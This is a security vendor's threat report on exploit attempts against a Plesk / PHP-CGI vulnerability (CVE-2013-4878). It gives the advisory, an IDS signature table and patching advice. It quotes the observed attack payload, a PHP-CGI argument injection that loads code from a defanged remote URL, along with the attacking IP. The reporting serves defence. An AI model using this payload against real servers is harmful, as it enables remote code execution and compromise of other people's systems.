Background on Six Month Old Vulnerability Exploit Attempt

The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:

Critical Plesk Vulnerability

Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:

ScriptAlias /phppath/ "/usr/bin/"

Plesk administrators should contact their distribution channels for more information regarding configuration best practices.

Event

During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n

Actions Taken

The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.

Data Seen

The top ten signatures seen in connection with this attack were:

Count
Signature

206,235

TCP_Service_Sweep

10,394

HTTP: Detect PHP-CGI Remote code Execution vulnerability

3,477

PHP Remote Code Execution

2,212

TCP_Probe_Other

1,803

ICMP_Flood

820

SERVER-WEBAPP PHP-CGI remote file include attempt

453

PHP CGI Query String Parameter Handling Information Disclosure and DoS Vulnerability(34804)

450

SYNFlood

227

TCP SYN Host Sweep

177

PHP CGI Query String Parameter Handling Code Injection Vulnerability(34790)
Scroll to view full table

This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.

Summary and Recommendations

Attacks, such as this one, only reinforces the XFTAS’ recommendations to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement. Sometimes, as in this case, it may be months before the vulnerability is exploited.

Further References

More from Software Vulnerabilities

Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP”

September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a…

Self-Checkout This Discord C2

This post was made possible through the contributions of James Kainth, Joseph Lozowski, and Philip Pedersen. In November 2022, during an incident investigation involving a self-checkout point-of-sale (POS) system in Europe, IBM Security X-Force identified a novel technique employed by an attacker to introduce a command and control (C2) channel built upon Discord channel messages. Discord is a chat, voice, and video service enabling users to join and create communities associated with their interests. While Discord and its related software…

Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism

In September 2022, Microsoft patched an information disclosure vulnerability in SPNEGO NEGOEX (CVE-2022-37958). On December 13, Microsoft reclassified the vulnerability as “Critical” severity after IBM Security X-Force Red Security Researcher Valentina Palmiotti discovered the vulnerability could allow attackers to remotely execute code. The vulnerability is in the SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use. This vulnerability is a pre-authentication remote code execution vulnerability impacting a wide…

Containers, Security, and Risks within Containerized Environments

Applications have historically been deployed and created in a manner reminiscent of classic shopping malls. First, a developer builds the mall, then creates the various stores inside. The stores conform to the dimensions of the mall and operate within its floor plan. In older approaches to application development, a developer would have a targeted system or set of systems for which they intend to create an application. This targeted system would be the mall. Then, when building the application, they would…